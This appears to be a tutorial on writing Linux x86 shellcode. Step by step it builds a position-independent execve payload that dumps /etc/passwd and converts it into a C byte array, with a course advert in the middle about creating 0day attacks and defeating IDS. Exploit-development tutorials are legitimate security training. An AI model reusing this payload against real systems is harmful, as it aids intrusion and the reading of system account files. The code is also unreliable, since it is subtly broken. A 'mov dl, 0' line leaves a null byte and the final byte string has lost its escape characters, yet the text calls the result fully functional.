Most of the programs that we use every day contain bugs; a bug is a malfunction in a program, which can make the program take unwanted actions or errors. These bugs or vulnerabilities can be exploited by writing a code that is usually called an exploit. The most common types of vulnerabilities are those that concern the corruption of memory as buffer overflows, the heap overflows, race conditions, format string attacks, etc… In this article, we won’t learn to write an exploit, we will not even see how to search for a vulnerability in a software, but we will see how to write and analyze shellcode and the relationship with the above.

The shellcode is generally regarded as a program that starts a shell, and is used as the payload of the exploit. In reality, one shellcode can do everything that makes a normal program. The shellcode is executed after the vulnerability has been exploited.

In this article, we will analyze and write shellcode for Linux x86 32-bit architectures.
I pointed out the type of architecture, that is because shellcode is usually written in assembly language, and each processor family has its own set of instructions. In addition, each operating system has its own system calls to make service requests to the kernel.

To make a system call using the int 0×80 instruction, the kernel then checks the value of the EAX register to take the number of the system call. Each system call is identified by a unique number that the kernel recognizes.
We look at the system call in Linux, they are located (in Ubuntu) in the following file:

/usr/src/linux-headers-3.0.0-25/arch/x86/include/asm/unistd_32.h

It’s time to start!
Let’s write our first shellcode – I have chosen to write a fairly simple, so as to better understand the steps necessary to analyze and optimize it. What we need is to write shellcode that should display the command “cat” the contents of the file /etc/passwd file (this file contains some information about the system account).

;/bin/cat /etc/passwdsection .data
    cmd db '/bin/cat', 0
    file db '/etc//passwd'
section .text
global _start
_start:
    ; execve("/bin/cat",["/bin/cat", "/etc//passwd"], NULL)
    mov eax, 11
    mov edx, 0
    mov ebx,cmd
    push edx
    mov ecx,file
    push ecx
    push ebx
    mov ecx,esp
    int 80h

To run the program, and then view the contents of the file /etc/passwd, you must:

$ nasm -f elf shellcode00.asm
$ ld -o shellcode00 shellcode00.o
$ ,/ shellcode00

As expected, the shellcode shows the contents of the passwd file. But look at what has been written, the code consists of the section “.data” and the section “text”; the segment data contains the variable declarations cmd and file, and the code segment contains the code required to run the command “cat /etc/passwd”. In particular, it uses the execve system call, which in Linux is used to execute a program. The first argument is a pointer to the string “/bin/cat”, which is the program you want to execute, the second argument (the array index) contains the program to execute bit “/bin/cat” and the argument passed “/etc//passwd”, the third and final argument is empty, but must be terminated with a null pointer to 32 bits.

The first statement that we meet “mov eax, 11″, the number 11 is the number of system calls.

We now start debugging with gdb

Now we follow step by step until instruction: “mov ecx, esp” and let us examine the registers ebx and ecx

We note that the ebx register contains the address of the string “/bin/cat”, while the ecx register contains the address of the string “/etc//passwd”, we also have to take a look at the stack:

After the instruction “mov ecx, esp”, as you can see from the stack, the ecx register will contain just addresses “/bin/cat”and “/etc//passwd”.

In the code we’ve written, there are some major problems; the first problem is that segment of the data, as you could guess the schellcode once it has been injected into a running program, it must have the code independent of the position of the variables in memory to run correctly. So the next step is that of delete the data segment,. To do this, use the following instructions:

jmp end
start:
pop ecx
1
end:
call start
db '/etc//passwd'

This method solves the problem by putting the string immediately after the call instruction, its address is pushed onto the stack, after the pop instruction extracts the address from the stack and places it in a register, in our case the ecx register.
Considering the above, we make the change to the code (create new file shellcode01.asm), as seen below:

BITS 32
jmp end
start:
 ; execve("/bin/cat",["/bin/cat", "/etc//passwd"], NULL)
 pop ecx
 mov eax, 11
 mov edx, 0
 push 0
 push dword 0x7461632f
 push dword 0x6e69622f
 mov ebx,esp
 push edx
 push ecx
 push ebx
 mov ecx,esp
 int 80h
end:
 call start
 db '/etc//passwd'

BITS 32 indicates to nams that the code we're going to run a 32-bit code, note that I decided to write /bin/cat with the instructions:

push dword 0x7461632f ; /cat
push dword 0x6e69622f ; /bin

Then run the program (debugging with gdb) until the instruction "mov ecx, esp"

As you can see in the image above, the esp register contains the address of the string "/bin/cat" and the string "/etc/passwd", after the instruction mov ecx, esp, the ecx register will contain just the second argument of execve function.
Let us now turn to the second problem which is that of the null byte, and then examine the disassembly of the binary file to see if there are any in our code

As you can see, there are null bytes in the following lines:

 8048063: b8 0b 00 00 00 mov $0xb,%eax
 8048068: ba 0000 00 00  mov $0x0,%edx

This is because the registers eax, and edx are 32-bit, and really just an 8-bit register for the operation, in fact, using the 8-bit registers al the dl, possesses the least significant byte in the current registry avoiding null bytes in the machine code

 8048069: b0 0b mov $0xb,%al
 804806b: b2 00 mov $0x0,%dl

Before doing this, however, you have to reset the registers and you can safely use the instruction "xor"(since they have no effect on the flag of the processor).

Then fill the complete code (create new file shellcode02.asm):

BITS 32
jmp end
start:
 ; execve("/bin/cat",["/bin/cat", "/etc//passwd"], NULL)
 pop ecx
 xor eax,eax
 xor edx,edx
 xor ebx,ebx
 mov al, 11
 mov dl, 0
 push ebx
 push dword 0x7461632f
 push dword 0x6e69622f
 mov ebx,esp
 push edx
 push ecx
 push ebx
 mov ecx,esp
 int 80h
end:
 call start
 db '/etc//passwd'

Finally place the code that shows the instructions with the corresponding opcode:

$ nasm -f elf shellcode02.asm
$ ld -o shellcode02 shellcode02.o

Want to learn more?? The InfoSec Institute Advanced Hacking course aims to train you on how to successfully attack fully patched and hardened systems by developing your own exploits. You will how to circumvent common security controls such as DEP and ASLR, and how to get to confidential data. You take this knowledge back to your organization and can then formulate a way to defend against these sophisticated attacks. Some features of this course include:
  • Create 0day attacks as part of the Advanced Persistent Threat
  • 5 days of Intensive Hands-On Labs
  • Use fuzzers and dynamic analysis to attack custom and COTS apps
  • Reverse engineer binaries to find new vulnerabilities never discovered before
  • Attack and defeat VPNs, IDS/IPS and other security technologies

Then we can write our shellcode in the form that we are used to seeing, as shown below:

char shellcode[] ="xebx1fx59x31xc0x31xd2x31xdbxb0x0bxb2x00"
 "x53x68x2fx63x61x74x68x2fx62x69x6ex89xe3"
 "x52x51x53x89xe1xcdx80xe8xdcxffxffxffx2f"
 "x65x74x63x2fx2fx70x61x73x73x77x64";

At this point we have a fully functional piece of shellcode that outputs to /etc/passwd.

Conclusion

As we have seen, the assembly language is the heart of an effective and efficient shellcode. Shellcode is therefore often created to target one specific combination of processors, operating systems and service packs, called a platform. For some exploits, due to the constraints put on the shellcode by the target process, a very specific shellcode must be created. However, it is not impossible for one shellcode to work for multiple exploits, service packs, operating systems and even processors [1].

Therefore, if you are familiar with assembly language and architecture of operating systems, there is no barrier that could limit our imagination.

References

[1] http://en.wikipedia.org/wiki/Shellcode#Platforms